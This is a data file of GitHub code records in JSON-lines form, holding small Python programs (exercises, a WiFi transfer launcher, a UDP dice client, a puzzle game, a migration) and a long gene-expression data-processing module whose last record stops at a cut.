obj.addAtTail(val)\r\n# obj.addAtIndex(index,val)\r\n# obj.deleteAtIndex(index)","repo_name":"kartikeya-arun/codes","sub_path":"Python/leetcode/design-linked-list.py","file_name":"design-linked-list.py","file_ext":"py","file_size_in_byte":2049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19036638590","text":"import socket,os,sys\nfrom send import transfer\nfrom receive import receive\nimport gui\ndef main():\n args = sys.argv\n #print(sys.argv)\n path = os.path.dirname(sys.argv[0])\n #print(path)\n if len(args) == 1:\n main = gui.main()\n main.mainloop()\n elif len(args) == 2:\n if args[1].lower()==\"receive\":\n receive(path)\n else:\n transfer(args[1],path)\n else:\n if args[1].lower()==\"raw\":\n transfer(\" \".join(args[2:]),path,raw=True)\n else:\n print(\"Received too many or too few arguments...\")\n #input(\"Press 'Enter' to exit...\\n\")\n\nif __name__==\"__main__\":\n main()\n","repo_name":"ClackHack/WifiTransfer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25179073354","text":"import json\r\nimport sys\r\ndata = []\r\nlongdict={}\r\nseqdict={}\r\niddict={}\r\nnumdict={}\r\nwith open(sys.argv[1]) as json_file: #Datei wird dem Programm als Commandline Argument übergeben.\r\n data = json.load(json_file) #Laden des JSON Files und erstellen von später verwendeten Dictionaries sowie Abspeicherung des JSON Files in \"data\" als Liste\r\n\r\n #Erstellen des Longdict welches als Key die ID der Sequenz und als Values die Informationseinträge dafür enthält\r\nfor i in range(len(data)):\r\n for element in data[i][\"alignment\"]:\r\n temp=[]\r\n for long in data[i][\"alignment\"][element]:\r\n temp.append (long)\r\n longdict[element]=temp\r\n#Erstellen des Seqdict mit den Sequenz IDs als Keys und den dazugehörigen Sequenzen\r\nfor element in longdict:\r\n x=element\r\n y=longdict[element]\r\n temp2=[]\r\n for element in y:\r\n temp=[]\r\n a = element.split(\"|\")\r\n for idx, val in enumerate(a):\r\n if idx == 3:\r\n temp2.append(val)\r\n temp2=\"\".join(temp2)\r\n seqdict[x]=temp2\r\n#Erstellen des Numdict mit den Sequenz IDs als Keys und den dazugehörigen Basenpaarpositionen in ihrer RNA\r\nfor element in longdict:\r\n x=element\r\n y=longdict[element]\r\n temp2=[]\r\n for element in y:\r\n temp=[]\r\n a = element.split(\"|\")\r\n for idx, val in enumerate(a):\r\n if idx == 4:\r\n temp2.append(val)\r\n numdict[x]=temp2\r\n#Erstellen des iddicts mit den Motif IDs als Keys und den Alignment Loop IDs als Values\r\nfor i in range(len(data)):\r\n alignment_keys=[]\r\n alignment_keys=list(data[i][\"alignment\"].keys())\r\n iddict[data[i][\"motif_id\"]]=alignment_keys\r\n#Loopf ID Eingabe als try/except Schleife\r\ntry:\r\n Eingabe = sys.argv[2]\r\n for value in iddict[Eingabe]:\r\n print(value,\",\",seqdict[value],\",\",numdict[value])\r\nexcept:\r\n print(\"Please enter a motif ID after your JSON file\")\r\n\r\njson_file.close","repo_name":"HighCaffeineIntake/Python-Projects","sub_path":"json2Pythonlibrary.py","file_name":"json2Pythonlibrary.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28422188533","text":"lista = [1, 10]\n\ntry:\n divisao = 10 / 0 \n #numero = lista[3]\n #x = a\n\n numero = lista[1]\n\nexcept ZeroDivisionError:\n print(\"Não é possível dividir por 0.\")\n#except:\n # print(\"Erro desconhecido\")\nexcept BaseException as ex:\n print(\"Erro desconhecido {}\".format(ex))\n \n#parte do código que depende que não tenha nenhum erro\nelse:\n print('Executa quando não ocorre exceção')\n\n#vai executar de qualquer maneira\nfinally:\n print('Sempre executa')","repo_name":"Fer-code/Python","sub_path":"FirstPythonProjects/Excecoes_personalizadas.py","file_name":"Excecoes_personalizadas.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38858239989","text":"# 题目:请输入星期几的第一个字母来判断一下是星期几,如果第一个字母一样,则继续判断第二个字母。\n\nweekDict = {'M':'Monday', 'T':{'u': 'Tuesday', 'h':'Thursday'}, 'W':'Wednesday', 'F':'Friday', \n\t'S':{'a':'Saturday', 'u':'Sunday'}}\n\nday = input('输入第一个字母:')\nday = day.upper()\n\nif day in ['T', 'S']:\n\tday2 = input('输入第二个字母:')\n\tprint(weekDict[day][day2])\nelse:\n\tprint(weekDict[day])","repo_name":"EruDev/Python-Practice","sub_path":"菜鸟教程100例/31.py","file_name":"31.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11750224827","text":"'''\n John O'Connell\n CS5001\n Fall 2021\n Final Project\n Main Driver for the CS5001 Puzzle Slide Game\n'''\n\nfrom game import *\nimport turtle\n\ndef main():\n\n # sets up the game window\n screen_setup()\n # runs the splash screen to start the game\n splash_screen()\n # gets name and number of moves from user\n player_name, max_moves = get_user_input()\n # creates the gameboard frame\n create_gameboard()\n # process' the puzzle selection, mario puzzle to start\n current_puzz = process_selection('mario.puz', player_name, max_moves)\n # runs the game ui\n run_game_ui(current_puzz)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"John-OConnell/Sliding_Puzzle_Game","sub_path":"puzzle_game.py","file_name":"puzzle_game.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12852982412","text":"#program that converts a currency to another\n\namount_euro = float(input('Input amount of Euro here: '))\nexchange_rate = float(10.85)\namount_nok = amount_euro * exchange_rate\n\nif amount_euro < 0:\n print('Amount must be >= 0. Please try again.')\nelse:\n print('Amount of NOK:', amount_nok)","repo_name":"DavidKuhestani/Python_programs","sub_path":"practical 3/p4-5p1.py","file_name":"p4-5p1.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72302176760","text":"#%%\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom micro_ch_pre import micro_ch_pre\nfrom prepare_fft import prepare_fft\nfrom _plot import dim3_plot as myplt3\nimport glob\nimport os\nfrom _save import save_3d_plot as save\nfrom PIL import Image\n\ndirname = 'output_2023-11-17-16-05-52'\n\n# ------------------------------------------------------------------------\n# ファイルの読み込み\n# ------------------------------------------------------------------------\n# 数字順にファイル名をソートするための関数\ndef numerical_sort(value):\n value = os.path.basename(value)\n parts = value.split('_') # ファイル名をアンダースコアで分割\n if len(parts) == 2:\n try:\n return int(parts[1].split('.')[0]) # 数字部分を抜き出して整数に変換\n except ValueError:\n return value\n return value\n\nfile_pattern = os.path.join(f\"result/{dirname}/res\", '*con*')\nfile_list = glob.glob(file_pattern)\nsorted_file_list = sorted(file_list, key=numerical_sort)\n\n#%%\n# ------------------------------------------------------------------------\n# jpeg画像の保存\n# ------------------------------------------------------------------------\n\nos.mkdir(f\"result/{dirname}/pic\")\nfor i, file_path in enumerate(sorted_file_list):\n if os.path.isfile(file_path): # ファイルかどうかを確認\n dat = np.load(file_path)\n base = save.get_base_name(file_path)\n\n fig = plt.figure()\n myplt3.display_3d_matrix(dat, False, False)\n plt.savefig(f\"result/{dirname}/pic/{base}.jpeg\", dpi=200, format=\"jpeg\")\n plt.show()\n#%%\n\n# ------------------------------------------------------------------------\n# gifの作成\n# ------------------------------------------------------------------------\nfile_pattern = os.path.join(f\"result/{dirname}/pic\", '*con*')\nfile_list = glob.glob(file_pattern)\nsorted_file_list = sorted(file_list, key=numerical_sort)\n\nimage_list = []\nfor filename in sorted_file_list:\n if filename.endswith('.jpeg') or filename.endswith('.jpg'):\n # JPEGファイルを開く\n img = Image.open(filename) \n image_list.append(img)\n\noutput_file = f\"result/{dirname}/output.gif\"\nimage_list[0].save(output_file, save_all=True, append_images=image_list[1:], duration=100, loop=0)\n\n#%%\n","repo_name":"Tan-Furukawa/phase_filed","sub_path":"binary_monoclinic_3d/make_gif.py","file_name":"make_gif.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28004880850","text":"\"\"\"user_access_history_action\n\nRevision ID: 3a553fb8b911\nRevises: 138ca0a2b975\nCreate Date: 2023-01-27 16:03:25.497058\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"3a553fb8b911\"\ndown_revision = \"138ca0a2b975\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column(\n \"user_access_history\", sa.Column(\"action\", sa.String(), nullable=True)\n )\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column(\"user_access_history\", \"action\")\n # ### end Alembic commands ###\n","repo_name":"AndreiUkladchikov/YandexPracticumTeam","sub_path":"flask_app/alembic/versions/3a553fb8b911_user_access_history_action.py","file_name":"3a553fb8b911_user_access_history_action.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6267006834","text":"\"\"\"tests.py\"\"\"\n\nimport pytest\n\nfrom .schema import Schema, encode, decode, EncodeException\n\nclass TestSchema(Schema):\n prop1: str = 'required'\n prop2: int\n\ndef test_encoding():\n encoded = encode(TestSchema, {\n 'prop1': 'a property',\n 'prop2': 2\n })\n assert encoded.prop1 == 'a property'\n assert encoded.prop2 == 2\n\ndef test_type_validation():\n with pytest.raises(TypeError):\n encoded = encode(TestSchema, {\n 'prop1': 'a property',\n 'prop2': 'not an integer'\n })\n\ndef test_required_constraint():\n encoded1 = encode(TestSchema, {'prop1': 'a property'})\n assert encoded1.prop1 == 'a property'\n assert encoded1.prop2 is None\n with pytest.raises(EncodeException):\n encoded2 = encode(TestSchema, {\n 'prop2': 'missing required prop1',\n })\n\ndef test_decode():\n for index in range(1,5):\n decoded = {'prop1': f'property{index}', 'prop2': index}\n encoded = encode(TestSchema, decoded)\n assert decode(encoded) == decoded\n\n","repo_name":"perintyler/PyObjectValidation","sub_path":"src/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73104327480","text":"from socket import *\nimport pickle\n# Definition der Socket-Parameter\nfrom Tools.scripts.treesync import raw_input\n\nhost = \"127.0.0.1\" # IP-Adresse des Servers\nport = 4711 # Port-Adresse des Servers\naddr = (host, port)\nbuf = 128 # Max. Speicher fuer Eingangsdaten\n# Initialisierung eines UDP-Sockets\n\nUDPSock = socket(AF_INET, SOCK_DGRAM)\nshutDown = True\nwhile shutDown:\n prompt = raw_input(\"Geben Sie die gewuenschte Anzahl der Wuerfe ein:>\")\n print(\"Die Eingabe lautet:\", prompt)\n shutDown = False\n\nprint(\"Sending to server\")\nUDPSock.sendto(str(prompt).encode('utf-8'), addr) # ... versenden\n(data, addr) = UDPSock.recvfrom(buf) # warten...\ndata = pickle.loads(data)\nprint()\nprint(\"Folgende Augenzahlen wurden geworfen:\")\nprint(\"( 1er 2er 3er 4er 5er 6er )\")\nprint(\" \", data)\nprint()\n# print(\"Server:\", addr, \" Nachricht:\", int(data))\n","repo_name":"FriedrichKlemm/Python_Uni","sub_path":"ServerClientDice/Client_Dice.py","file_name":"Client_Dice.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18934095849","text":"\"\"\"\nAuthor: Alexandra Lee\nDate Created: 16 June 2020\n\nThis script provide supporting functions to run analysis notebooks.\n\nData processing functions including:\n* function to map ensembl gene ids to hgnc symbols\n* function to remove subsets of samples\n* function to transform data into integer for downstream DE and GSEA analyses\n* function to normalize data\n* function to format pseudomonas pathway data to input to GSEA\n\"\"\"\n\nimport os\nimport pickle\nimport random\nimport tensorflow as tf\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom matplotlib_venn import venn2\nfrom glob import glob\n\n\nfrom sklearn.preprocessing import MinMaxScaler\nfrom ponyo import simulate_expression_data\n\n# Setup function\n\n\ndef set_all_seeds(np_seed=42, rn_seed=12345, tf_seed=1234):\n \"\"\"\n This function sets all seeds to get reproducible VAE trained\n models.\n \"\"\"\n\n # The below is necessary in Python 3.2.3 onwards to\n # have reproducible behavior for certain hash-based operations.\n # See these references for further details:\n # https://keras.io/getting-started/faq/#how-can-i-obtain-reproducible-results-using-keras-during-development\n # https://docs.python.org/3.4/using/cmdline.html#envvar-PYTHONHASHSEED\n # https://github.com/keras-team/keras/issues/2280#issuecomment-306959926\n\n os.environ[\"PYTHONHASHSEED\"] = \"0\"\n\n # The below is necessary for starting Numpy generated random numbers\n # in a well-defined initial state.\n np.random.seed(np_seed)\n\n # The below is necessary for starting core Python generated random numbers\n # in a well-defined state.\n random.seed(rn_seed)\n # The below tf.set_random_seed() will make random number generation\n # in the TensorFlow backend have a well-defined initial state.\n tf.set_random_seed(tf_seed)\n\n\ndef replace_ensembl_ids(expression_df, gene_id_mapping):\n \"\"\"\n Replaces ensembl gene ids with hgnc symbols\n\n Arguments\n ---------\n expression_df: df\n gene expression data matrix (sample x gene)\n gene_id_mapping: df\n Dataframe mapping ensembl ids (used in DE_stats_file) to hgnc symbols,\n used in Crow et. al.\n\n NOTE:\n -----\n This function is deprecated due to large memory usage: when `expression_df`\n is a large dataframe, manipulating it inside the momory becomes very slow\n (and sometimes even impossible) due to large memory consumption.\n\n The same functionality has been refactored into `get_renamed_columns()` and\n `map_recount2_data()` functions in this module.\n\n THIS FUNCTION IS KEPT AS A REFERENCE ONLY.\n \"\"\"\n\n # Some columns are duplicates, for example:\n # (ENSG00000223773.7, ENSG00000223773) --> CD99P1\n # (ENSG00000124334.17, ENSG00000124334) --> IL9R\n # We keep the first occurence of duplicated ensembl ids\n updated_mapping = gene_id_mapping.loc[\n ~gene_id_mapping.index.duplicated(keep=\"first\")\n ]\n\n # Same ensembl ids are mapped to different gene symbol twice (CCL3L1, CCL3L3)\n # ENSG00000187510.7 ENSG00000187510 C12orf74\n # ENSG00000187510.7 ENSG00000187510 PLEKHG7\n # Manually mapping them based on what is found on ensembl site\n manual_mapping = {\n \"ENSG00000187510.7\": \"PLEKHG7\",\n \"ENSG00000230417.11\": \"LINC00595\",\n \"ENSG00000255374.3\": \"TAS2R45\",\n \"ENSG00000276085.1\": \"CCL3L1\",\n }\n\n # Apply manual mappings to `updated_mapping`\n for ensembl_id, gene_symbol in manual_mapping.items():\n updated_mapping.loc[ensembl_id].hgnc_symbol = gene_symbol\n\n # Remove paralogs.\n # Some ensembl ids are paralogs (for example, \"geneA\" and \"geneA_PAR_Y\").\n # They map to the same hgnc symbol. Homologous sequences are paralogous\n # if they were separated by a gene duplication event: if a gene in an\n # organism is duplicated to occupy two different positions in the same\n # genome, then the two copies are paralogous.\n updated_expression_df = expression_df.iloc[\n :, ~expression_df.columns.str.contains(\"PAR_Y\")\n ]\n\n # Replace ensembl ids with gene symbol\n updated_expression_df.columns = updated_expression_df.columns.map(\n updated_mapping[\"hgnc_symbol\"]\n )\n\n # Remove columns whose mapped ensembl id is an empty string\n updated_expression_df = updated_expression_df.iloc[\n :, updated_expression_df.columns != \"\"\n ]\n\n # Remove columns whose mapped ensembl id is `NaN`\n updated_expression_df = updated_expression_df.iloc[\n :, updated_expression_df.columns.notnull()\n ]\n\n return updated_expression_df\n\n\ndef create_recount2_compendium(download_dir, output_filename):\n \"\"\"\n Concatenate `t_data_counts.tsv` in each project directory and create the\n single recount2 commpendium file in TSV format.\n The first row in each `t_data_counts.tsv` is a header line that includes\n column names, so only the header in the first `t_data_counts.tsv` is copied\n to the output file.\n\n Arguments\n ---------\n download_dir: str\n dirname that hosts all downloaded projects data\n output_filename: str\n filename of output single compendium data\n \"\"\"\n\n data_counts_filenames = glob(f\"{download_dir}/*/t_data_counts.tsv\")\n data_counts_filenames.sort()\n\n compendium_header = None\n with open(output_filename, \"w\") as ofh:\n for filename in data_counts_filenames:\n with open(filename) as ifh:\n file_header = ifh.readline()\n if compendium_header is None:\n compendium_header = file_header\n ofh.write(compendium_header)\n elif file_header != compendium_header:\n raise Exception(f\"Inconsistent header in {filename}\")\n\n file_content = ifh.read()\n ofh.write(file_content)\n\n\ndef get_published_generic_genes(filename):\n \"\"\"\n Get generic genes based on input filename, which could be a URL.\n\n Arguments\n ---------\n filename: str\n name of the file that includes published generic genes\n \"\"\"\n\n df = pd.read_csv(filename, header=0, sep=\"\\t\")\n published_generic_genes = list(df[\"Gene_Name\"])\n return published_generic_genes\n\n\ndef get_merged_gene_id_mapping(gene_id_filename, raw_ensembl_genes):\n \"\"\"\n Merge genes in input gene_id file with the raw ensembl gene IDs.\n\n Arguments\n ---------\n gene_id_filename: str\n filename of input gene IDs;\n raw_ensembl_genes: list\n list of strings (ensembl gene IDs)\n\n Returns\n -------\n Mapping between ensembl ids and hgnc symbols\n \"\"\"\n\n original_gene_id_mapping = pd.read_csv(\n gene_id_filename, header=0, sep=\"\\t\", index_col=0\n )\n\n # Get mapping between ensembl ids with and without version numbers.\n # The genes in `ensembl_genes` has version numbers at the end.\n ensembl_gene_ids = pd.DataFrame(\n data={\n \"ensembl_version\": raw_ensembl_genes,\n \"ensembl_parsed\": [gene_id.split(\".\")[0] for gene_id in raw_ensembl_genes],\n }\n )\n\n # Map ensembl gene ids with version number to gene_id_mapping\n merged_gene_id_mapping = pd.merge(\n original_gene_id_mapping,\n ensembl_gene_ids,\n left_on=\"ensembl_gene_id\",\n right_on=\"ensembl_parsed\",\n how=\"outer\",\n )\n\n # Set `ensembl_version` column as the index\n merged_gene_id_mapping.set_index(\"ensembl_version\", inplace=True)\n\n return merged_gene_id_mapping\n\n\ndef get_renamed_columns(\n raw_ensembl_ids,\n merged_gene_id_mapping,\n manual_mapping,\n DE_prior_filename,\n shared_genes_filename,\n):\n \"\"\"\n Find the new column names and corresponding column indexes.\n\n Arguments\n ---------\n raw_ensembl_ids:\n list of strings (ensembl gene IDs), which are columns names in\n raw recount2 data file;\n merged_gene_id_mapping: DataFrame\n merged gene ID mapping;\n manual_mapping: dict\n dict of manual mapping (key: ensembl_id, value: gene symbol)\n DE_prior_filename: str\n input filename that includes symbols of published generic genes\n shared_genes_filename: str\n name of output pickled file (a list of shared gene symbols)\n\n Returns\n -------\n A tuple that includes two entries. The first entry is a list\n of hgnc gene symbols (which will be the new column names in remapped\n recount2 data file; The second entry is a dict whose keys are hgnc gene\n symbols and values are lists of the corresponding indexes of columns in\n the raw recount2 data file (most lists include only one column index.)\n\n \"\"\"\n\n updated_mapping = merged_gene_id_mapping.loc[\n ~merged_gene_id_mapping.index.duplicated(keep=\"first\")\n ]\n for ensembl_id, gene_symbol in manual_mapping.items():\n updated_mapping.loc[ensembl_id].hgnc_symbol = gene_symbol\n\n # Build a dict that maps hgnc symbols to column indexes in raw recount2 data\n hgnc_to_cols = dict()\n for col_idx, ensembl_id in enumerate(raw_ensembl_ids):\n # Skip paralogs (whose ensembl_id includes \"PAR_Y\")\n if \"PAR_Y\" in ensembl_id:\n continue\n\n hgnc_symbol = updated_mapping.loc[ensembl_id].hgnc_symbol\n\n # Skip hgnc gene symbols that are `float` type (NaN) or empty strings\n if type(hgnc_symbol) == float or len(hgnc_symbol) == 0:\n continue\n\n if hgnc_symbol in hgnc_to_cols:\n hgnc_to_cols[hgnc_symbol].append(col_idx)\n else:\n hgnc_to_cols[hgnc_symbol] = [col_idx]\n\n our_gene_ids_hgnc = list(hgnc_to_cols.keys())\n\n published_generic_genes = get_published_generic_genes(DE_prior_filename)\n shared_genes_hgnc = list(\n set(our_gene_ids_hgnc).intersection(published_generic_genes)\n )\n\n # In Python, the order of elements in a list that is converted from a set\n # is non-deterministic, so it is sorted here to have reproducible result.\n shared_genes_hgnc.sort()\n\n # Pickle `shared_genes_hgnc` and save as `shared_genes_filename`\n if not os.path.exists(shared_genes_filename):\n with open(shared_genes_filename, \"wb\") as pkl_fh:\n pickle.dump(shared_genes_hgnc, pkl_fh, protocol=3)\n\n return (shared_genes_hgnc, hgnc_to_cols)\n\n\ndef map_recount2_data(\n raw_filename,\n gene_id_filename,\n manual_mapping,\n DE_prior_filename,\n shared_genes_filename,\n new_filename,\n):\n \"\"\"\n Map the ensembl gene IDs in `raw_filename` to hgnc gene symbols based\n on the header line in `template_filename`, and save the new header\n and corresponding data columns to `new_filename`.\n \"\"\"\n\n # Read the header line of `raw_filename` to get its column names:\n raw_header_df = pd.read_csv(raw_filename, header=0, sep=\"\\t\", nrows=1)\n raw_ensembl_ids = list(raw_header_df.columns)\n if raw_ensembl_ids[0] == \"Unnamed: 0\":\n del raw_ensembl_ids[0]\n\n merged_gene_id_mapping = get_merged_gene_id_mapping(\n gene_id_filename, raw_ensembl_ids\n )\n\n shared_genes_hgnc, hgnc_to_cols = get_renamed_columns(\n raw_ensembl_ids,\n merged_gene_id_mapping,\n manual_mapping,\n DE_prior_filename,\n shared_genes_filename,\n )\n\n col_indexes = list()\n for hgnc in shared_genes_hgnc:\n col_indexes += hgnc_to_cols[hgnc]\n\n output_cols = [\"\"]\n for hgnc in shared_genes_hgnc:\n output_cols += [hgnc] * len(hgnc_to_cols[hgnc])\n output_header = \"\\t\".join(output_cols) + \"\\n\"\n\n with open(new_filename, \"w\") as ofh:\n ofh.write(output_header)\n with open(raw_filename) as ifh:\n for line_num, line in enumerate(ifh):\n if line_num == 0:\n continue\n tokens = line.strip(\"\\n\").split(\"\\t\")\n sample_id = tokens[0].strip('\"')\n input_values = tokens[1:]\n output_values = list()\n for idx in col_indexes:\n output_values.append(input_values[idx])\n ofh.write(sample_id + \"\\t\" + \"\\t\".join(output_values) + \"\\n\")\n\n\ndef process_raw_template_pseudomonas(\n processed_compendium_filename,\n project_id,\n metadata_filename,\n metadata_delimiter,\n experiment_id_colname,\n sample_id_colname,\n raw_template_filename,\n):\n \"\"\"\n Create processed pseudomonas template data file based on\n processed compendium file (`compendium_filename`),\n drop sample rows if needed, and save updated\n template data on disk.\n \"\"\"\n\n # Get sample ids associated with selected project id\n sample_ids = simulate_expression_data.get_sample_ids(\n metadata_filename,\n metadata_delimiter,\n experiment_id_colname,\n project_id,\n sample_id_colname,\n )\n\n # Get samples from experiment id\n processed_compendium = pd.read_csv(\n processed_compendium_filename, header=0, index_col=0, sep=\"\\t\"\n )\n template_data = processed_compendium.loc[sample_ids]\n\n template_data.to_csv(raw_template_filename, sep=\"\\t\")\n\n\ndef normalize_compendium(\n mapped_filename, normalized_filename, scaler_filename,\n):\n \"\"\"\n Read the mapped compendium file into memory, normalize it, and save\n both normalized compendium data and pickled scaler on disk.\n \"\"\"\n\n # Read mapped compendium file: ~4 minutes (17 GB of RAM)\n mapped_compendium_df = pd.read_table(\n mapped_filename, header=0, sep=\"\\t\", index_col=0\n )\n print(\n \"input: dataset contains {} samples and {} genes\".format(\n mapped_compendium_df.shape[0], mapped_compendium_df.shape[1]\n )\n )\n\n # 0-1 normalize per gene\n scaler = MinMaxScaler()\n\n # Fitting (2 minutes, ~8 GB of RAM)\n normalized_compendium = scaler.fit_transform(mapped_compendium_df)\n normalized_compendium_df = pd.DataFrame(\n normalized_compendium,\n columns=mapped_compendium_df.columns,\n index=mapped_compendium_df.index,\n )\n\n # Save normalized data on disk: ~17.5 minutes\n normalized_compendium_df.to_csv(normalized_filename, float_format=\"%.3f\", sep=\"\\t\")\n del normalized_compendium_df\n\n # Pickle `scaler` as `scaler_filename` on disk\n with open(scaler_filename, \"wb\") as pkl_fh:\n pickle.dump(scaler, pkl_fh, protocol=3)\n\n\ndef process_raw_compendium_pseudomonas(\n raw_filename, processed_filename, normalized_filename, scaler_filename,\n):\n \"\"\"\n Create processed pseudomonas compendium data file based on raw compendium\n data file (`raw_filename`), and normalize the processed compendium.\n\n Note: This function was designed to processed data from the pseudomonas\n compendium defined in the ADAGE paper\n (https://msystems.asm.org/content/1/1/e00025-15).\n \"\"\"\n\n # Create processed pseudomonas compendium data file\n raw_compendium = pd.read_csv(raw_filename, header=0, index_col=0, sep=\"\\t\")\n\n if raw_compendium.shape[1] != 5549:\n processed_compendium = raw_compendium.T\n else:\n processed_compendium = raw_compendium\n\n assert processed_compendium.shape[1] == 5549\n\n # Save transformed compendium data\n processed_compendium.to_csv(processed_filename, sep=\"\\t\")\n\n # Normalize processed pseudomonas compendium data\n normalize_compendium(processed_filename, normalized_filename, scaler_filename)\n\n\ndef process_raw_compendium_recount2(\n raw_filename,\n gene_id_filename,\n manual_mapping,\n DE_prior_filename,\n shared_genes_filename,\n mapped_filename,\n normalized_filename,\n scaler_filename,\n):\n \"\"\"\n Create mapped recount2 compendium data file based on raw compendium\n data file (`raw_filename`), and normalize the mapped compendium.\n \"\"\"\n\n # Create mapped recount2 compendium data file\n map_recount2_data(\n raw_filename,\n gene_id_filename,\n manual_mapping,\n DE_prior_filename,\n shared_genes_filename,\n mapped_filename,\n )\n\n # Normalize mapped recount2 compendium data\n normalize_compendium(mapped_filename, normalized_filename, scaler_filename)\n\n\n# TO DO:\n# Either move to a plot.py function or remove if not needed with new changes\n# Functions related to visualizing trends in generic\n# genes/pathways found\n# * function to generate summary dataframes\n# * function to plot trends\n# * function to compare groups of genes\n\n\ndef merge_abs_raw_dfs(abs_df, raw_df, condition):\n \"\"\"\n This function merges and returns dataframe containing\n summary gene results using absolute value of the test\n statistic and raw test statistic values.\n\n Arguments\n ---------\n abs_df: df\n Summary df using absolute value of test statistic\n raw_df: df\n Summary df using raw value of test statistic\n condition: str\n Condition from E-GEOD-33245. Either '1v2', '1v3', '1v4' or '1v5'\n \"\"\"\n merged_df = abs_df.merge(\n raw_df,\n left_on=\"Gene ID\",\n right_on=\"Gene ID\",\n suffixes=[f\"_grp_{condition}\", f\"_grp_{condition}_raw\"],\n )\n\n return merged_df\n\n\ndef merge_two_conditions_df(\n merged_condition_1_df, merged_condition_2_df, condition_1, condition_2\n):\n \"\"\"\n This function merges and returns summary dataframes across two conditions to\n compare trends. For example, merge summary dataframes between 1v2 and 1v3.\n\n Arguments\n ---------\n merged_condition_1_df: df\n df of results for one of the E-GEOD-33245 conditions ('1v2', '1v3', '1v4' or '1v5')\n returned from `merge_abs_raw_dfs`\n merged_condition_2_df: df\n df of results for another one of the E-GEOD-33245 conditions ('1v2', '1v3', '1v4' or '1v5')\n returned from `merge_abs_raw_dfs`\n condition_1: str\n Condition from E-GEOD-33245 associated with 'merged_condition_1_df'.\n Either '1v2', '1v3', '1v4' or '1v5'\n condition_2: str\n Condition from E-GEOD-33245 associated with 'merged_condition_2_df'.\n Either '1v2', '1v3', '1v4' or '1v5'\n \"\"\"\n merged_all_df = merged_condition_1_df.merge(\n merged_condition_2_df, left_on=\"Gene ID\", right_on=\"Gene ID\"\n )\n merged_all_df[\"max Z score\"] = (\n merged_all_df[\n [f\"abs(Z score)_grp_{condition_1}\", f\"abs(Z score)_grp_{condition_2}\"]\n ]\n .abs()\n .max(axis=1)\n )\n merged_all_df[\"Gene ID Name\"] = (\n merged_all_df[\"Gene ID\"]\n + \" \"\n + merged_all_df[f\"Gene Name_grp_{condition_1}\"].fillna(\"\")\n )\n\n merged_df = merged_all_df[\n [\n \"Gene ID\",\n \"Gene ID Name\",\n f\"Test statistic (Real)_grp_{condition_1}\",\n f\"Test statistic (Real)_grp_{condition_1}_raw\",\n f\"Adj P-value (Real)_grp_{condition_1}\",\n f\"Mean test statistic (simulated)_grp_{condition_1}\",\n f\"Std deviation (simulated)_grp_{condition_1}\",\n f\"Median adj p-value (simulated)_grp_{condition_1}\",\n f\"Test statistic (Real)_grp_{condition_2}\",\n f\"Test statistic (Real)_grp_{condition_2}_raw\",\n f\"Adj P-value (Real)_grp_{condition_2}\",\n f\"Mean test statistic (simulated)_grp_{condition_2}\",\n f\"Std deviation (simulated)_grp_{condition_2}\",\n f\"Median adj p-value (simulated)_grp_{condition_2}\",\n f\"abs(Z score)_grp_{condition_1}\",\n f\"abs(Z score)_grp_{condition_2}\",\n \"max Z score\",\n ]\n ]\n return merged_df\n\n\ndef plot_two_conditions(merged_df, condition_1, condition_2, xlabel, ylabel):\n \"\"\"\n This function plots scatterplot comparing trends across two\n conditions\n\n Arguments\n ---------\n merged_df: df\n Merged df containing results for two conditions of E-GEOD-33245.\n Created from `merge_two_conditions_df`\n condition_1:condition_1: str\n Condition from E-GEOD-33245 associated with 'merged_df'.\n Either '1v2', '1v3', '1v4' or '1v5'\n condition_2: str\n Condition from E-GEOD-33245 associated with 'merged_df'.\n Either '1v2', '1v3', '1v4' or '1v5'\n xlabel: str\n Label to describe condition_1\n ylabel: str\n Label to describe condition_2\n\n \"\"\"\n fig, axes = plt.subplots(ncols=2, nrows=1, figsize=(10, 4))\n cmap = sns.cubehelix_palette(start=2.8, rot=0.1, as_cmap=True)\n\n fig_abs = sns.scatterplot(\n data=merged_df,\n x=f\"Test statistic (Real)_grp_{condition_1}\",\n y=f\"Test statistic (Real)_grp_{condition_2}\",\n hue=\"max Z score\",\n size=\"max Z score\",\n linewidth=0,\n alpha=0.7,\n ax=axes[0],\n palette=cmap,\n )\n fig_abs.plot([0, 4], [0, 4], \"--k\")\n\n fig_raw = sns.scatterplot(\n data=merged_df,\n x=f\"Test statistic (Real)_grp_{condition_1}_raw\",\n y=f\"Test statistic 